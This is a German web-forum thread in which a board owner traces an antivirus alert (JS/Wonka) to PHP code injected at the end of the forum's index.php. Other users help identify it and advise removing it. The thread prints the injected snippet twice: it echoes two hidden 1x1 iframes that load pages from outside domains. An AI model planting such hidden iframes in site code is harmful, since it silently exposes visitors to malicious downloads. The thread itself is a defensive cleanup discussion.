Hamsterli
Problembeschreibung: Hilfe, ich habe ein Trojanisches Pferd in meinem Forumsverzeichnis. Ich bin jetzt auf der Arbeit und komme nicht an meinen Server heran. Was kann ich tun?
Fehlermeldung: Sobald die index.php angewählt wird, erscheint die Meldung des Virusscanner. Erkannt als JS/Wonka. Als Name nennt der Virusscanner index.htm aber so eine Datei habe ich nicht in meinem Boardverzeichnis.
Was wurde zuletzt geändert oder eingebaut? habe heute morgen die style-datei wieder neu aufgespielt, weil ich bei dem header-template die navileiste "zerstört" hatte.
HILFE. Der verzweifelte Hamster
Polarist2k
URL zum Board?
Ansonsten: Haste ein BackUp, wo noch alles virenfrei war?!
Hamsterli
ich nicht, aber sicher mein Webspace-Anbieter
SessionX
naja wenn du nen Trojaner auf dem Server haben solltest dann viel Spaß
Hast keine Viren Software auf dem Server drauf ?
Hamsterli
ich hab einfach nur ein Webspace-Paket: Eigentlich geh ich davon aus, dass sowas installiert ist
KleenMicha
| Zitat: |
Original von Poetschke
naja wenn du nen Trojaner auf dem Server haben solltest dann viel Spaß
Hast keine Viren Software auf dem Server drauf ? |
mal wieder ein großartiger Beitrag.
Zum eigentlichen Problem der Vrius verbreitet sich über javascript daher die Frage hast du in deiner Seite zufällig javascript Codes eingebaut außer den vom wbb original?
Bzw hast du per iframe vlt eine andere Seite bei dir eingebunden?
Hamsterli
Auf der Homepage ja, einen Java-Chat zB, aber nicht im Forum. Da ist nichts eingebaut, außer der Style. Die Meldung kommt ja auch nur, wenn man das Forum anwählt, aber nicht, wenn man die Page oder irgendwelche Unterseiten ansurft.
edit: 23:31 hab mir gerade mal ie index.php angeschaut... ganz unten habe ich das gefunden...
| code: |
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
|
}
}
eval("\$tpl->output(\"".$tpl->get("index")."\");");
?>
<?
echo '<iframe src="http://iframebiz.biz/dl/adv443.php" width=1 height=1></iframe>';
echo '<iframe src="http://www.wakayama-info.net/board/includes/top/9094/index.html" width=1 height=1></iframe>';
?> |
|
könnte es das sein??? woher kommt das?
Polarist2k
Lösch mal den untersten Teil
| code: |
1:
2:
3:
4:
5:
6:
7:
|
<?
echo '<iframe src="http://iframebiz.biz/dl/adv443.php" width=1 height=1></iframe>';
echo '<iframe src="http://www.wakayama-info.net/board/includes/top/9094/index.html" width=1 height=1></iframe>';
?> |
|
raus ...
Weil ich nehme mal an, dass es daran liegt, insbesondere am zweiten Teil, wenn du sagst, dass die Trojanermeldung von ner index.html herrührt ...
American
| Zitat: |
Original von Hamsterli
woher kommt das? |
Du, oder einer, der Zugang zum Server hat, wird es eingebaut haben
Hamsterli
ich wars nicht, und die leute, die offiziell zugriff haben auch nicht. kann das ja nur inoffiziell gewesen sein.
Und durch das hochladen des styles gestern morgen kann es nicht sein? Ist nämlich danach direkt aufgetreten.
American
Da du das in der index.php gefunden hast, wird es nicht am Style liegen, oder hast du dabei die index.php ausgetauscht?
Hamsterli
jup, hast recht. Vielen Dank. Dann muss ich mir wohl mal bißl sorgen machen.
es scheint das tatsächlich gewesen zu sein! Vielen Dank an alle für die schnelle Hilfe!!! 
